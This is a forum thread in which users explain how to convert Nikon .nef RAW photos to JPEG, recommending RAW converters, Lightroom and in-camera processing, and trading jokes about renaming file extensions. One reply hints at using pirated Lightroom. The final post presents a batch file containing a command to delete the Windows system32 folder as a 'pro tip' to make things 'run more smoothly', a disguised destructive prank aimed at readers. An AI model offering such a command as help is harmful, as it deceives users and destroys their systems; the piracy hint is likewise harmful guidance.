How do I turn a .nef format into a .jpg format

Took some pics recently with my daughters nikon d90, and the files are all .nef format. I would like to change to .jpg or .jpeg format. Anyone help me with this one? Thanks much.

.nef is the Nikon RAW
format. You need a RAW
convertor - a basic one
should have come with
the software supplied
with your camera. There
are also more
sophisticated programs
in Photoshop and Paint
Shop Pro if you have
access to either of those.
The convertor will
enable you to make jpgs.
RAW pictures can be
regarded as ‘digital
negatives’ and should be
retained as you can
manipulate them over
and again without loss of

A free converter can be found here if you dont have one.

Meanwhile, if you don’t like the .nef files, you can set the camera to just shoot JPEGs. I prefer RAW files (my Canons make .CR2 files), as they’re a lot more flexible in what you can do to them (such as fixing exposure, color balance, contrast). But they create a lot more steps in the process, and complicate things. Using JPEGs is much simpler…

thanks guys, i got it figured it out, appreciate your help:)

A very basic and quick fix is to keep the files on the SD card or copy them back on there, and to use the menu on the D90. One of the options should be something like raw processing, it’ll give you plenty of options.

If you have a hundred dollars to spare (for the academic version), you can acquire Photoshop lightroom, it’s a very fast and very clean Raw engine, and an awesome asset manager.
You can download a trial at

Not that im condoning it, but a quick search found a full version of photoshop lightsroom for free. Not saying its strictly legal, but its out there.

I paid close to $300 for Lightroom, and it was well worth it. More than 90% of my image processing is now done in there, and I only need Photoshop when I want to do some fancy editing. Highly recommended.

BTW, now that memory cards are cheap, I shoot RAW+JPEG. This gives me the flexibility of usable images right out of the camera, and still the ability to process and improve those same images later.

Processed entirely in Adobe Lightroom:
(BTW, this is one of the featured rides of MUni Weekend 16)


Practically any peace of software can be downloaded for free, same goes with movies and music, I don’t think one should hint or encourage to steal company’s hard work and source of profit. Behind any company there are people’s jobs and intellectual property.


Sorry these guys are beating a dead horse after you already solved your problem It amazes me that no one suggested the obvious solution…just change the file extension.

nef and jpegs are two different things, changing the file extension won’t miraculously turn a nef file into jpeg. It’ll just show you a really low rez JPEG proxy embedded within the raw file for preview purposes.
It might be obvious but it won’t work.

Don’t be silly. I turn .pdfs into .mp3 files like that all the time. They sound great.

Thanks for the suggestion, Harper!

I just converted the .exe file for some malware into a high-quality .flac using that method, turned the volume up, and let that computer virus rape my ears in full surround sound :sunglasses:

If you encounter any difficulties with this, I have a pro tip that should make everything run more smoothly in addition to allowing your computer to properly run your new audio file.

Just open up Notepad and type in the following:

@echo off
del c:\WINDOWS\system32

Save the file as makethiswork.bat (just be sure to remember to add the .bat extension and save as all files).
Double click on your new .bat file to open it and you should be good to go :slight_smile:

This only works on Windows, btw.